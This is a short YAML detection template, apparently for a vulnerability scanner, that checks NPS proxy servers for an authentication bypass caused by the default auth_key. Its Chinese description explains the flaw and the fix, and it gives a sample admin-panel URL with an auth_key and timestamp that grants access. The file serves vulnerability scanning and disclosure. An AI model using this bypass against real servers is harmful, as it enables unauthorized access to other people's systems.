id: nps-default-key

info:
  name: NPS default key
  author: li1u(https://huclilu.github.io/)
  severity: critical
  verified: true
  description: |
     nps在默认情况下，允许使用auth_key和timestamp两个参数即可绕过身份验证进入后台(密钥是基于当前时间的时间戳进行哈希计算生成的，只有20s的操作时间，到期之后可尝试生成新的auth_key和timestamp进行后续利用)，修复方式：将nps.conf中#auth_key=test注释去掉；重新编译，不要下载GitHub现成版本
     body="NPS" || product="nps"；只有使用了默认key才可以尝试利用，利用示例：url后边直接访问Index/Index?auth_key=8796e03429632be8992af4e12c2ff69b&timestamp=1685545695
  created: 2023/06/01
    
rules:
   r1:
      request:
        method: GET
        path: /auth/getauthkey
      expression: response.status == 200 && response.body.bcontains(b'"5acabcf051cd55abca03d18294422e01"')
expression: r1()
